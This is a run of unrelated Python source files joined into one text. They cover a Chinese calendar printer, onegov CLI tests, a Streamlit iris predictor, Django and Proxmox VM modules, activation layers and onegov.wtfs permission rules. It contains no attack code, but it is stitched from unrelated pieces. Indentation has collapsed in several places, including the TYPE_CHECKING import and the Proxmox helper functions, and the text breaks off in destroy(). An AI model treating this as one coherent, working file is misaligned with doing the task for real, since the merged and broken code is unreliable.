        366 if is_bissextile(year) else 365
        for year in range(1970, years)
    )
def start_day(year, months):
    """Return the weekday (0 = Sunday) of the 1st of *months*/*year*.

    1970-01-01 was a Thursday, hence the base offset of 4.
    """
    elapsed = 4 + total_days(year)
    elapsed += sum(days_of_month(year, month) for month in range(1, months))
    return elapsed % 7
def print_week(year,month):
    """Print the calendar grid for *year*/*month*.

    Prints a Sunday-first weekday header, pads the first row with tabs up
    to the month's starting weekday, then prints every day of the month,
    wrapping to a new line after the Saturday column.
    """
    # header: Sunday through Saturday (Chinese weekday names)
    print("日\t一\t二\t三\t四\t五\t六")
    # i counts the leading blank columns still to print; j tracks the
    # current column (wraps after 7).
    i=start_day(year,month)
    i-=1
    j=1
    while(i>=0):
        print(end="\t")
        i-=1
        if(j>=7):
            j-=7
            print(end="\n")
        j+=1
    # day 1 is printed separately; the loop handles the remaining days
    print("1",end="\t")
    j+=1
    for k in range(2,days_of_month(year,month)+1):
        print(str(k),end="\t")
        if(j>=7):
            j-=7
            print(end="\n")
        j+=1
# Prompt for the year/month to show and print that month's calendar.
sel_year = int(input("year(year>=1970):"))
sel_month = int(input("month(1<=month<=12):"))
print("\t\t " + str(sel_year) + "年" + str(sel_month) + "月\n")
print_week(sel_year, sel_month)
|
import os
import yaml
from click.testing import CliRunner
from datetime import datetime
from onegov.chat import MessageCollection
from onegov.core.cli.commands import cli as core_cli
from onegov.event import Event, EventCollection
from onegov.org.cli import cli
from onegov.ticket import TicketCollection
from onegov.user import User
from transaction import commit
def test_manage_orgs(postgres_dsn, temporary_directory, redis_url):
    """CLI test: creates an org instance, refuses a duplicate path and
    deletes the instance again via the core CLI."""
    cfg = {
        'applications': [
            {
                'path': '/onegov_org/*',
                'application': 'onegov.org.OrgApp',
                'namespace': 'onegov_org',
                'configuration': {
                    'dsn': postgres_dsn,
                    'depot_backend': 'depot.io.memory.MemoryFileStorage',
                    'redis_url': redis_url,
                    'websockets': {
                        'client_url': 'ws://localhost:8766',
                        'manage_url': 'ws://localhost:8766',
                        'manage_token': 'super-super-secret-token'
                    }
                }
            }
        ]
    }
    cfg_path = os.path.join(temporary_directory, 'onegov.yml')
    with open(cfg_path, 'w') as f:
        f.write(yaml.dump(cfg))
    runner = CliRunner()
    # creating a new instance succeeds
    result = runner.invoke(cli, [
        '--config', cfg_path, '--select', '/onegov_org/newyork',
        'add', 'New York'
    ])
    assert result.exit_code == 0
    assert "New York was created successfully" in result.output
    # adding the same path again must fail
    result = runner.invoke(cli, [
        '--config', cfg_path, '--select', '/onegov_org/newyork',
        'add', 'New York'
    ])
    assert result.exit_code == 1
    assert "may not reference an existing path" in result.output
    # the instance can be deleted through the core cli
    result = runner.invoke(core_cli, [
        '--config', cfg_path, '--select', '/onegov_org/newyork', 'delete'
    ], input='y\n')
    assert result.exit_code == 0
    assert "Instance was deleted successfully" in result.output
def test_fetch_with_state_and_tickets(
        cfg_path, session_manager, test_password):
    """CLI test for 'fetch' with --create-tickets and --state-transfers.

    Imports events from a remote schema into a local one, verifies ticket
    and message creation, transfers remote state changes and checks ticket
    cleanup for deleted remote events.
    """
    runner = CliRunner()
    local = 'baz'
    remote = 'bar'
    session_manager.ensure_schema_exists('foo-baz')
    session_manager.ensure_schema_exists('foo-bar')

    def events(entity=local):
        # all events stored in the given schema
        return get_session(entity).query(Event)

    def get_session(entity):
        session_manager.set_current_schema(f'foo-{entity}')
        return session_manager.session()

    for entity, title, source, tags, location in (
        (remote, '1', None, [], ''),
        (remote, '2', None, [], None),
    ):
        EventCollection(get_session(entity)).add(
            title=title,
            start=datetime(2015, 6, 16, 9, 30),
            end=datetime(2015, 6, 16, 18, 00),
            timezone='Europe/Zurich',
            tags=tags,
            location=location,
            source=source,
            organizer_email='triceracops@newyork.com',
            organizer_phone='079 123 45 67',
        )
    commit()
    get_session(local).add(User(
        username='admin@example.org',
        password_hash=test_password,
        role='admin'
    ))
    commit()
    # test published_only, import none
    result = runner.invoke(cli, [
        '--config', cfg_path,
        '--select', f'/foo/{local}',
        'fetch',
        '--source', remote,
        '--create-tickets',
        '--published-only'
    ])
    assert result.exit_code == 0
    assert "0 added, 0 updated, 0 deleted" in result.output
    # Import initiated events
    result = runner.invoke(cli, [
        '--config', cfg_path,
        '--select', f'/foo/{local}',
        'fetch',
        '--source', remote,
        '--create-tickets',
    ])
    assert result.exit_code == 0
    assert "2 added, 0 updated, 0 deleted" in result.output
    local_event = events().filter_by(title='1').first()
    assert local_event.state == 'submitted'
    assert local_event.organizer_email == 'triceracops@newyork.com'
    assert local_event.organizer_phone == '079 123 45 67'
    assert TicketCollection(get_session(local)).query().count() == 2
    assert MessageCollection(get_session(local)).query().count() == 2
    assert TicketCollection(get_session(local)).query().first().muted is True
    collection = TicketCollection(get_session(local))
    ticket = collection.by_handler_id(local_event.id.hex)
    assert ticket.title == local_event.title
    assert ticket.handler.event == local_event
    assert ticket.handler.source == 'fetch-bar-1'
    assert ticket.handler.import_user == 'admin@example.org'
    assert ticket.state == 'open'
    # Change the state of one ticket
    remote_event = events(remote).filter_by(title='1').first()
    remote_event.submit()
    remote_event.publish()
    commit()
    # Test not updating anything,
    result = runner.invoke(cli, [
        '--config', cfg_path,
        '--select', '/foo/baz',
        'fetch',
        '--source', remote,
        '--create-tickets',
        '--state-transfers', 'published:withdrawn'
    ])
    assert result.exit_code == 0
    assert "0 added, 0 updated, 0 deleted" in result.output
    # Withdraw event when ticket is still open and state is initiated
    remote_event = events(remote).filter_by(title='1').first()
    remote_event.withdraw()
    commit()
    assert remote_event.state == 'withdrawn'
    result = runner.invoke(cli, [
        '--config', cfg_path,
        '--select', '/foo/baz',
        'fetch',
        '--source', remote,
        '--create-tickets',
        '--state-transfers', 'initiated:withdrawn',
        '--state-transfers', 'submitted:withdrawn'
    ])
    assert result.exit_code == 0
    assert "0 added, 1 updated, 0 deleted" in result.output
    local_event = events(local).filter_by(title='1').first()
    assert local_event.state == 'withdrawn'
    collection = TicketCollection(get_session(local))
    ticket = collection.by_handler_id(local_event.id.hex)
    # do not touch tickets when updating state
    assert ticket.state == 'open'
    # Change state of remaining to published
    # Change the state of one ticket
    remote_event = events(remote).filter_by(title='2').first()
    remote_event.submit()
    remote_event.publish()
    commit()
    # Update local state from submitted to published
    result = runner.invoke(cli, [
        '--config', cfg_path,
        '--select', '/foo/baz',
        'fetch',
        '--source', remote,
        '--create-tickets',
        '--state-transfers', 'submitted:published'
    ])
    assert result.exit_code == 0
    assert "0 added, 1 updated, 0 deleted" in result.output
    event = events(local).filter_by(title='2').first()
    assert event.state == 'published'
    # Delete the original event
    remote_event = events(remote).filter_by(title='2').first()
    get_session(remote).delete(remote_event)
    commit()
    result = runner.invoke(cli, [
        '--config', cfg_path,
        '--select', '/foo/baz',
        'fetch',
        '--source', remote,
        '--create-tickets',
        '--delete-orphaned-tickets'
    ])
    assert result.exit_code == 0
    assert "0 added, 0 updated, 1 deleted" in result.output
    assert TicketCollection(get_session(local)).query().count() == 1
    assert MessageCollection(get_session(local)).query().count() == 1
    # Check closing local tickets when first event is deleted
    remote_event = events(remote).filter_by(title='1').first()
    get_session(remote).delete(remote_event)
    commit()
    result = runner.invoke(cli, [
        '--config', cfg_path,
        '--select', '/foo/baz',
        'fetch',
        '--source', remote,
    ])
    assert result.exit_code == 0
    assert "0 added, 0 updated, 1 deleted" in result.output
    ticket = TicketCollection(get_session(local)).query().one()
    # for open tickets this creates two ticket messages: closed and open
    messages = MessageCollection(get_session(local)).query().all()
    assert all(m.owner == 'admin@example.org' for m in messages)
def test_fetch(cfg_path, session_manager, test_password):
    """CLI test for 'fetch': importing events between schemas, filtered by
    source, tag and location."""
    runner = CliRunner()
    session_manager.ensure_schema_exists('foo-baz')
    session_manager.ensure_schema_exists('foo-qux')

    def get_session(entity):
        session_manager.set_current_schema(f'foo-{entity}')
        return session_manager.session()

    # seed the 'bar' and 'baz' schemas with events of varying source/tags/
    # location; events with a source are skipped by fetch
    for entity, title, source, tags, location in (
        ('bar', '1', None, [], ''),
        ('bar', '2', None, ['A'], None),
        ('bar', '3', None, ['A', 'B'], 'bar'),
        ('bar', '4', None, ['A', 'C'], '1234 Bar'),
        ('bar', '5', None, ['C'], 'there in 4321 baz!'),
        ('bar', '6', 'xxx', [], 'bar'),
        ('bar', '7', 'yyy', ['A', 'B'], None),
        ('baz', 'a', None, [], 'BAZ'),
        ('baz', 'b', None, ['A', 'C'], '4321 Baz'),
        ('baz', 'c', 'zzz', ['B', 'C'], 'bar'),
    ):
        EventCollection(get_session(entity)).add(
            title=title,
            start=datetime(2015, 6, 16, 9, 30),
            end=datetime(2015, 6, 16, 18, 00),
            timezone='Europe/Zurich',
            tags=tags,
            location=location,
            source=source
        )
    commit()
    for entity in ('bar', 'baz', 'qux'):
        get_session(entity).add(User(
            username='admin@example.org',
            password_hash=test_password,
            role='admin'
        ))
    commit()
    assert get_session('bar').query(Event).count() == 7
    assert get_session('baz').query(Event).count() == 3
    assert get_session('qux').query(Event).count() == 0
    assert get_session('bar').query(Event).first().state == 'initiated'
    # No sources provided
    result = runner.invoke(cli, [
        '--config', cfg_path,
        '--select', '/foo/qux',
        'fetch',
    ])
    assert result.exit_code != 0
    assert "Provide at least one source" in result.output
    # Bar[*] -> Qux
    result = runner.invoke(cli, [
        '--config', cfg_path,
        '--select', '/foo/qux',
        'fetch',
        '--source', 'bar'
    ])
    assert result.exit_code == 0
    assert "5 added, 0 updated, 0 deleted" in result.output
    assert get_session('qux').query(Event).first().state == 'published'
    # Bar[B, C] -> Qux
    result = runner.invoke(cli, [
        '--config', cfg_path,
        '--select', '/foo/qux',
        'fetch',
        '--source', 'bar',
        '--tag', 'A',
        '--tag', 'B'
    ])
    assert result.exit_code == 0
    assert "0 added, 0 updated, 2 deleted" in result.output
    # Bar[C], Baz[C] -> Qux
    result = runner.invoke(cli, [
        '--config', cfg_path,
        '--select', '/foo/qux',
        'fetch',
        '--source', 'bar',
        '--source', 'baz',
        '--tag', 'C',
    ])
    assert result.exit_code == 0
    assert "2 added, 0 updated, 2 deleted" in result.output
    # Baz['bar'] qux['bar'] -> Bar
    result = runner.invoke(cli, [
        '--config', cfg_path,
        '--select', '/foo/bar',
        'fetch',
        '--source', 'baz',
        '--source', 'qux',
        '--location', 'bar',
    ])
    assert result.exit_code == 0
    assert "0 added, 0 updated, 0 deleted" in result.output
    # Bar['baz'] -> Baz
    result = runner.invoke(cli, [
        '--config', cfg_path,
        '--select', '/foo/baz',
        'fetch',
        '--source', 'qux',
        '--source', 'bar',
        '--location', 'baz',
    ])
    assert result.exit_code == 0
    assert "1 added, 0 updated, 0 deleted" in result.output
|
import streamlit as st
import plotly.express as px
import numpy as np
import pickle
import load_data
import time
# make a timer on the page
# with st.spinner(text='In progress'):
# time.sleep(5)
# st.success('Done')
# input images / video -- link to the file you want
# could upload file to the specific df
# input images / video -- link to the file you want
# could upload file to the specific df
file = st.file_uploader('File uploader')
# have user pick a color
st.color_picker('Pick a color')
# name of the app we want to appear on the top of the screen
st.title("My Awesome Flower Predictor")
st.header("We predict Iris types")
st.subheader("No joke")
# get input from user about Iris and predict what type/species it is
# load data
df_iris = load_data.load_iris()
# make plots on the page
st.plotly_chart(px.scatter(df_iris, 'sepal_width', 'sepal_length'))
# make it an option to show only if the user wants to
# question prompt for checkbox -- save result as boolean
show_df = st.checkbox("Do you want to see the data?")
if show_df:  # if True
    # bare expression: streamlit "magic" renders the dataframe
    df_iris
# make interactive -- get user input so we can make a prediction
# must manually list the questions in the RIGHT ORDER as the df table
# sepal length
s_l = st.number_input('Input the Sepal Length')
# sepal width
s_w = st.number_input('Input the Sepal Width')
# petal length
p_l = st.number_input('Input the Petal Length')
# petal width
p_w = st.number_input('Input the Petal Width')
# we need a df or np array to feed into the model
user_values = np.array([s_l, s_w, p_l, p_w])
# load model -- make sure the model made was saved in the same env
# rb -- read binary
# wb -- write binary
with open('saved-iris-model-2.pkl', 'rb') as f:
    model = pickle.load(f)
# make prediction
# .predict, since our model is just a regular Logistic Regression
with st.echo():
    # st.echo() will output the actual code -- could have a checkbox for
    # people to see the code if they want
    prediction = model.predict(user_values.reshape(1, -1))
# need to have the variable on a line by itself for it to display in the app
prediction
# make our predictions look nicer for the user -- [0]
st.header(f'The model predicts: {prediction[0]}')
# easter egg
# st.balloons()
# make vertical columns (optional)
# NOTE(review): beta_container/beta_columns were removed from newer
# Streamlit releases -- use st.container()/st.columns(3) when upgrading.
st.beta_container()
col1, col2, col3 = st.beta_columns(3)
# col1.subheader('Columnisation')
# col2.subheader('Columnisation')
# col3.subheader('Columnisation')
# can do the above OR context blocks like below
with col1:
    'I am printing things'
with col2:
    df_iris
with col3:
    st.subheader("cool stuff")
import fullname
import unittest
class TestFullname(unittest.TestCase):
    """Unit tests for fullname.fullname(first, last)."""

    # Invalid input (non-alphabetical characters, trailing spaces, etc.)
    # must raise a TypeError.
    def test_fullname_input(self):
        self.assertRaises(TypeError, fullname.fullname, 'first124', 'last ')

    # Non-string arguments must raise a TypeError.
    def test_fullname_input_type(self):
        self.assertRaises(TypeError, fullname.fullname, 3, "name")

    # An empty string argument must raise a Warning to alert the user.
    def test_fullname_empty_string(self):
        self.assertRaises(Warning, fullname.fullname, "", "last")

    # General correctness of the happy path.
    # Bug fix: the original used assertTrue(value, "John Smith"), where the
    # second argument is only the failure MESSAGE -- so the expected value
    # was never compared. assertEqual performs the actual comparison.
    def test_fullname_correct(self):
        self.assertEqual(fullname.fullname("John", "Smith"), "John Smith")


if __name__ == "__main__":
    unittest.main()
import os, requests, zipfile
download_url = 'https://storage.googleapis.com/download.tensorflow.org/models/inception5h.zip'
model_file = 'tensorflow_inception_graph.pb'
def download_model(data_dir):
    """Download the inception model archive into *data_dir*, extract it and
    return the path of the extracted model graph file.

    Raises requests.HTTPError on a failed download.
    """
    download_path = get_zip_file_name(data_dir)
    # Stream the (large) archive to disk instead of buffering it fully in
    # memory, and fail loudly on HTTP errors -- the original silently wrote
    # whatever body the server returned, including error pages.
    response = requests.get(download_url, stream=True)
    response.raise_for_status()
    with open(download_path, 'wb') as f:
        for chunk in response.iter_content(chunk_size=1 << 20):
            f.write(chunk)
    with zipfile.ZipFile(download_path, 'r') as zip_ref:
        zip_ref.extractall(data_dir)
    return get_model_file_name(data_dir)
def get_model_file_name(data_dir):
    """Return the path of the model graph file inside *data_dir*."""
    model_path = os.path.join(data_dir, model_file)
    return model_path
def get_zip_file_name(data_dir):
    """Return the local path of the downloaded zip inside *data_dir*,
    named after the last segment of the download URL."""
    return os.path.join(data_dir, os.path.basename(download_url))
def download_model_if_not_exists(data_dir):
    """Return the model file path, downloading the archive first unless the
    zip is already present in *data_dir*."""
    # The zip acts as the download marker: if it exists, skip the download.
    if os.path.isfile(get_zip_file_name(data_dir)):
        return get_model_file_name(data_dir)
    if not os.path.isdir(data_dir):
        os.makedirs(data_dir)
    return download_model(data_dir)
from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from notification.models import Notification
from twitter_user.models import Profile
@login_required
def notifications_view(request, handle):
    """Render the notifications for the profile *handle* and clear them.

    Notifications are consumed on read: the page shows the ones that
    existed at request time, then deletes them.
    """
    html = 'notification.html'
    notifcation_count = Notification.objects.filter(user=request.user).count()
    # Materialize the queryset BEFORE deleting: the original passed the
    # lazy queryset to the template after deleting the rows, relying on the
    # implicit result cache; an unevaluated queryset would render empty.
    tweets = list(Notification.objects.filter(
        user=Profile.objects.get(handle=handle)))
    for tweet in tweets:
        tweet.delete()
    # NOTE(review): 'notifcation_count' is misspelled, but it is the context
    # key the template reads -- renaming requires a template change too.
    return render(
        request,
        html,
        {'tweets': tweets, 'notifcation_count': notifcation_count}
    )
|
# -*- coding: utf-8 -*-
import numpy as np
from torch import Tensor
from framework.modules import Module
class ReLU(Module):
    """Rectified Linear Unit activation layer."""

    def forward(self, x):
        """Apply max(0, x) element-wise, caching the input for backward.

        INPUT
            x: input tensor
        OUTPUT
            x with negative entries clamped to zero
        """
        self.x = x
        return x.clamp(min=0)

    def backward(self, grad):
        """Backpropagate through the ReLU.

        INPUT:
            grad: gradient of the previous layer
        OUTPUT:
            grad multiplied by the ReLU derivative (1 where x > 0, else 0)
        """
        mask = np.where(self.x <= 0, 0, 1)
        return grad * Tensor(mask).view(grad.size())
class LeakyReLU(Module):
    """Leaky ReLU activation layer with negative-side slope *a*."""

    def __init__(self, a=.001):
        # Slope applied to negative inputs.
        self.a = a

    def forward(self, x):
        """Apply the leaky ReLU element-wise, caching the input.

        INPUT
            x: input tensor
        OUTPUT
            x where x >= 0, a * x otherwise
        """
        self.x = x
        activated = np.where(x >= 0, x, self.a * x)
        return Tensor(activated)

    def backward(self, grad):
        """Backpropagate through the leaky ReLU.

        INPUT:
            grad: gradient of the previous layer
        OUTPUT:
            grad multiplied by 1 (where x >= 0) or a (where x < 0)
        """
        slope = np.where(self.x >= 0, 1, self.a)
        return grad * Tensor(slope).view(grad.size())
class Tanh(Module):
    """Hyperbolic tangent activation layer."""

    def forward(self, x):
        """Apply tanh element-wise, caching the result for backward.

        INPUT
            x: input tensor
        OUTPUT
            tanh(x)
        """
        self.x_tanh = x.tanh()
        return self.x_tanh

    def backward(self, grad):
        """Backpropagate using d tanh(x)/dx = 1 - tanh(x)^2.

        INPUT:
            grad: gradient of the previous layer
        OUTPUT:
            grad multiplied by the tanh derivative
        """
        derivative = 1 - self.x_tanh ** 2
        return grad * derivative.view(grad.size())
class Sigmoid(Module):
    """Sigmoid activation layer."""

    def forward(self, x):
        """Apply the sigmoid element-wise, caching the result.

        Computed as (1 + tanh(x / 2)) / 2, which equals 1 / (1 + exp(-x))
        but avoids overflow for large-magnitude inputs.

        INPUT
            x: input tensor
        OUTPUT
            sigmoid(x)
        """
        self.sigmoid = (1 + (x / 2).tanh()) / 2
        return self.sigmoid

    def backward(self, grad):
        """Backpropagate using s'(x) = s(x) * (1 - s(x)).

        INPUT:
            grad: gradient of the previous layer
        OUTPUT:
            grad multiplied by the sigmoid derivative
        """
        derivative = self.sigmoid * (1 - self.sigmoid)
        return grad * derivative.view(grad.size())
|
__author__="Sara Farazi"
# Defines a cell on the map with its four corner points
class Point:
    """A point on the map, given by its x and y coordinates."""

    def __init__(self, x, y):
        self.x, self.y = x, y
class Coordinates:
    """The four corner points of a rectangular map cell."""

    def __init__(self, upper_right, upper_left, lower_right, lower_left):
        # One attribute per corner so cells can address them directly.
        self.upper_left = upper_left
        self.upper_right = upper_right
        self.lower_left = lower_left
        self.lower_right = lower_right
class Cell:
    """A rectangular map cell identified by *id* and its corner points."""

    def __init__(self, id, coordinates):
        self.id = id
        # A Coordinates instance holding the four corner points.
        self.coordinates = coordinates

    def is_in_cell(self, point):
        """Return True if *point* lies strictly inside this cell.

        Bug fix: the original read self.lower_left / self.upper_left /
        self.upper_right, attributes that do not exist on Cell (the corners
        live on self.coordinates), so every call raised AttributeError.
        """
        corners = self.coordinates
        if corners.lower_left.y < point.y < corners.upper_left.y:
            if corners.upper_left.x < point.x < corners.upper_right.x:
                return True
        return False
|
import sedate
from datetime import datetime, timedelta
from onegov.core.security import Public
from onegov.core.security.permissions import Intent
from onegov.user import User
from onegov.user import UserCollection
from onegov.wtfs import WtfsApp
from onegov.wtfs.collections import ScanJobCollection
from onegov.wtfs.models import DailyList
from onegov.wtfs.models import DailyListBoxes
from onegov.wtfs.models import Municipality
from onegov.wtfs.models import Notification
from onegov.wtfs.models import ScanJob
from onegov.wtfs.models import UserManual
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from morepath import Identity
class AddModel(Intent):
    """ The permission to add a new instance of a given model. """
class AddModelUnrestricted(Intent):
    """ The permission to add a given model without any restrictions. """
class EditModel(Intent):
    """ The permission to edit an existing instance of a given model. """
class EditModelUnrestricted(Intent):
    """ The permission to edit a given model without any restrictions. """
class DeleteModel(Intent):
    """ The permission to delete an instance of a given model. """
class ViewModel(Intent):
    """ The permission to view an instance of a given model. """
class ViewModelUnrestricted(Intent):
    """ The permission to view a given model without any restrictions. """
def same_group(model: object, identity: 'Identity') -> bool:
    """ Returns True, if the given model is in the same user
    group/municipality as the given identity.

    Models carry either a ``group_id`` or a ``municipality_id``; a
    ``group_id`` attribute takes precedence even if it is unset.
    """
    if hasattr(model, 'group_id'):
        own_group = model.group_id
    elif hasattr(model, 'municipality_id'):
        own_group = model.municipality_id
    else:
        return False
    if own_group and identity.groupid:
        return own_group.hex == identity.groupid
    return False
@WtfsApp.setting_section(section="roles")
def get_roles_setting() -> dict[str, set[type[Intent]]]:
    """ Returns the default set of permissions granted to each role.

    Admins hold every permission; every other role only gets Public and
    relies on the model-specific permission rules below for anything more.
    """
    return {
        'admin': {
            AddModel,
            AddModelUnrestricted,
            EditModel,
            EditModelUnrestricted,
            DeleteModel,
            ViewModel,
            ViewModelUnrestricted,
            Public,
        },
        'editor': {
            Public,
        },
        'member': {
            Public,
        },
        'anonymous': {
            Public,
        },
    }
@WtfsApp.permission_rule(model=Municipality, permission=object)
def has_permission_municipality(
    app: WtfsApp,
    identity: 'Identity',
    model: Municipality,
    permission: object
) -> bool:
    """ Permission rule for municipalities: role defaults apply, except
    that municipalities which still have users or data attached may never
    be deleted. """
    # Municipalities with data and/or users cannot be deleted
    if permission in {DeleteModel}:
        if model.users.first():
            return False
        if model.has_data:
            return False
    return permission in getattr(app.settings.roles, identity.role)
@WtfsApp.permission_rule(model=UserCollection, permission=object)
def has_permission_users(
    app: WtfsApp,
    identity: 'Identity',
    model: UserCollection,
    permission: object
) -> bool:
    """ Permission rule for the user collection. """
    # Editors may view and add users
    if identity.role == 'editor':
        if permission in {ViewModel, AddModel}:
            return True
    return permission in getattr(app.settings.roles, identity.role)
@WtfsApp.permission_rule(model=User, permission=object)
def has_permission_user(
    app: WtfsApp,
    identity: 'Identity',
    model: User,
    permission: object
) -> bool:
    """ Permission rule for single users. """
    # One may not delete himself
    if model.username == identity.userid:
        if permission in {DeleteModel}:
            return False
    # Editors may view, edit and delete members within the same group or
    # view and edit themselves
    if identity.role == 'editor':
        if permission in {ViewModel, EditModel, DeleteModel}:
            if model.role == 'member':
                if same_group(model, identity):
                    return True
        if permission in {ViewModel, EditModel}:
            if model.username == identity.userid:
                return True
    return permission in getattr(app.settings.roles, identity.role)
@WtfsApp.permission_rule(model=ScanJobCollection, permission=object)
def has_permission_scan_jobs(
    app: WtfsApp,
    identity: 'Identity',
    model: ScanJobCollection,
    permission: object
) -> bool:
    """ Permission rule for the scan job collection. """
    # Editors and members of groups may view and add scan jobs
    if identity.role in ('editor', 'member'):
        if identity.groupid:
            if permission in {ViewModel, AddModel}:
                return True
    return permission in getattr(app.settings.roles, identity.role)
@WtfsApp.permission_rule(model=ScanJob, permission=object)
def has_permission_scan_job(
    app: WtfsApp,
    identity: 'Identity',
    model: ScanJob,
    permission: object
) -> bool:
    """ Permission rule for single scan jobs. """
    # Editors and members of groups may view and edit scan jobs within
    # the same group
    if identity.role in ('editor', 'member'):
        if identity.groupid:
            if permission in {ViewModel, EditModel}:
                if same_group(model, identity):
                    return True
        if permission is DeleteModel and identity.role == 'editor':
            if same_group(model, identity):
                dt = model.dispatch_date
                # editors of the same group may delete scan jobs up until
                # 17:00 on the day before the dispatch
                horizon = datetime(dt.year, dt.month, dt.day, 17)
                horizon -= timedelta(days=1)
                horizon = sedate.replace_timezone(horizon, 'Europe/Zurich')
                now = sedate.utcnow()
                return now <= horizon
    return permission in getattr(app.settings.roles, identity.role)
@WtfsApp.permission_rule(model=DailyList, permission=object)
def has_permission_daily_list(
    app: WtfsApp,
    identity: 'Identity',
    model: DailyList,
    permission: object
) -> bool:
    """ Permission rule for the daily list. """
    # Members without groups (transport company) may view the daily list
    # selection form
    if identity.role == 'member':
        if not identity.groupid:
            if permission in {ViewModel}:
                return True
    return permission in getattr(app.settings.roles, identity.role)
@WtfsApp.permission_rule(model=DailyListBoxes, permission=object)
def has_permission_daily_list_boxes(
    app: WtfsApp,
    identity: 'Identity',
    model: DailyListBoxes,
    permission: object
) -> bool:
    """Let group-less members (the transport company) view the daily list
    boxes; everything else falls back to the role's permissions."""
    is_transport_company = identity.role == 'member' and not identity.groupid
    if is_transport_company and permission in {ViewModel}:
        return True
    return permission in getattr(app.settings.roles, identity.role)
@WtfsApp.permission_rule(model=Notification, permission=object)
def has_permission_notification(
    app: WtfsApp,
    identity: 'Identity',
    model: Notification,
    permission: object
) -> bool:
    """Notifications are viewable by everybody; other permissions fall back
    to the role's configured permissions."""
    return (
        permission in {ViewModel}
        or permission in getattr(app.settings.roles, identity.role)
    )
@WtfsApp.permission_rule(model=UserManual, permission=object)
def has_permission_user_manual(
    app: WtfsApp,
    identity: 'Identity',
    model: UserManual,
    permission: object
) -> bool:
    """The user manual is viewable by everybody; other permissions fall back
    to the role's configured permissions."""
    return (
        permission in {ViewModel}
        or permission in getattr(app.settings.roles, identity.role)
    )
|
import logging
import time
import re
from proxmoxer import ProxmoxAPI
from subcontractor.credentials import getCredentials
# https://pve.proxmox.com/pve-docs/api-viewer/
# Seconds between task-status polls in _taskWait().
POLL_INTERVAL = 4
# Maps friendly boot-device names to Proxmox's single-letter boot codes.
BOOT_ORDER_MAP = { 'hdd': 'c', 'net': 'n', 'cd': 'd' }
# Matches "<bridge>.<vlan>" network names, e.g. "vmbr0.100" (1-4 digit VLAN id).
vlaned_network = re.compile( r'^[a-zA-Z0-9][a-zA-Z0-9_\-]*\.[0-9]{1,4}$' )
def _connect( connection_paramaters ):
    """
    Build and return a ProxmoxAPI client for the given connection paramaters.

    'credentials' may be an inline dict or a string naming a stored
    credential set, which is resolved via getCredentials().
    """
    host = connection_paramaters[ 'host' ]
    creds = connection_paramaters[ 'credentials' ]
    if isinstance( creds, str ):
        # a bare string refers to externally stored credentials
        creds = getCredentials( creds )
    logging.debug( 'proxmox: connecting to "{0}" with user "{1}"'.format( host, creds[ 'username' ] ) )
    return ProxmoxAPI( host, user=creds[ 'username' ], password=creds[ 'password' ], verify_ssl=False )  # TODO: flag to toggle verify_ssl
def _disconnect( proxmox ):
pass
# proxmox.release_ticket() # TODO: what do we do to logout?, have to add the try/finally everywhere _disconnect is called
def _taskWait( node, taskid ):
while True:
status = node.tasks( taskid ).status.get()
if status[ 'status' ] != 'running':
return status[ 'exitstatus' ]
logging.debug( 'proxmox: Waiting ...' )
time.sleep( POLL_INTERVAL )
def _get_vm( proxmox, vmid ):
vmid = str( vmid )
for node in proxmox.nodes.get():
node = proxmox.nodes( node[ 'node' ] )
for vm in node.qemu.get():
if vm[ 'vmid' ] == vmid:
return node, node.qemu( vmid )
return None, None
def create( paramaters ):
    """
    Create (but do not start) a VM described by paramaters[ 'vm' ] on the
    node named in the vm paramaters, using the connection described by
    paramaters[ 'connection' ].  Returns { 'complete': True } on success,
    raises ValueError for an unknown network and Exception when the Proxmox
    create task fails.
    """
    connection_paramaters = paramaters[ 'connection' ]
    vm_paramaters = paramaters[ 'vm' ]
    vm_vmid = vm_paramaters[ 'vmid' ]
    vm_name = vm_paramaters[ 'name' ]
    logging.info( 'proxmox: creating vm "{0}"'.format( vm_name ) )
    proxmox = _connect( connection_paramaters )
    node = proxmox.nodes( vm_paramaters[ 'node' ] )
    # the bridge-type interfaces that exist on the target node
    network_list = [ net[ 'iface' ] for net in node.network.get() if 'bridge' in net[ 'type' ].lower() ]
    # TODO: let harddrive creation be raw or qcow2
    # TODO: need network boot order, or just the provisioning interface
    # validate every requested network (VLAN suffix stripped) exists on the node
    for interface in vm_paramaters[ 'interface_list' ]:
        network_name = interface[ 'network' ]
        if vlaned_network.match( network_name ):
            network_name, _ = network_name.split( '.' )
        if network_name not in network_list:
            raise ValueError( 'Network "{0}" not aviable on node "{1}"'.format( network_name, vm_paramaters[ 'node' ] ) )
    spec = {
        'vmid': vm_vmid,
        'name': vm_name,
        'ostype': vm_paramaters.get( 'ostype', 'l26' ),
        'memory': vm_paramaters.get( 'memory_size', 512 ),  # in MB
        'sockets': vm_paramaters.get( 'sockets', 1 ),
        'numa': vm_paramaters.get( 'numa', 0 ),
        'cores': vm_paramaters.get( 'core_count', 1 ),
        # translate friendly boot-order names into Proxmox's letter codes
        'boot': ''.join( BOOT_ORDER_MAP[i] for i in vm_paramaters.get( 'boot_order', 'nc' ) ),
        'scsihw': 'virtio-scsi-pci',
        'bootdisk': 'scsi0'
    }
    # netX entries, ordered by physical location
    interface_list = vm_paramaters[ 'interface_list' ]
    interface_list.sort( key=lambda a: a[ 'physical_location' ] )
    for index, interface in enumerate( interface_list ):
        network_name = interface[ 'network' ]
        vlan = ''
        if vlaned_network.match( network_name ):
            network_name, vlan = network_name.split( '.' )
            vlan = ',tag={0}'.format( vlan )
        spec[ 'net{0}'.format( index ) ] = '{0},bridge={1},firewall=0{2}'.format( interface.get( 'type', 'virtio' ), network_name, vlan )
    # scsiX entries, ordered by disk name; "<storage>:<size>" makes Proxmox
    # allocate the volume itself
    disk_list = vm_paramaters[ 'disk_list' ]
    disk_list.sort( key=lambda a: a[ 'name' ] )
    for index, disk in enumerate( disk_list ):
        location = 'local'
        spec[ 'scsi{0}'.format( index ) ] = '{0}:{1}'.format( location, disk.get( 'size', 10 ) )  # size in GiB
    # have yet to find the log file for the "{data:null}" results; running
    # `qm create` on the command line helps expose the error,
    # https://pve.proxmox.com/pve-docs/qm.1.html
    taskid = node.qemu.create( **spec )
    if _taskWait( node, taskid ) != 'OK':
        raise Exception( 'Create task failed' )
    return { 'complete': True }
def destroy( paramaters ):
    """
    Delete the VM identified by paramaters[ 'vmid' ].  Returns
    { 'done': True } even when the VM no longer exists; raises Exception
    when the Proxmox delete task fails.
    """
    connection_paramaters = paramaters[ 'connection' ]
    vm_vmid = paramaters[ 'vmid' ]
    vm_name = paramaters[ 'name' ]
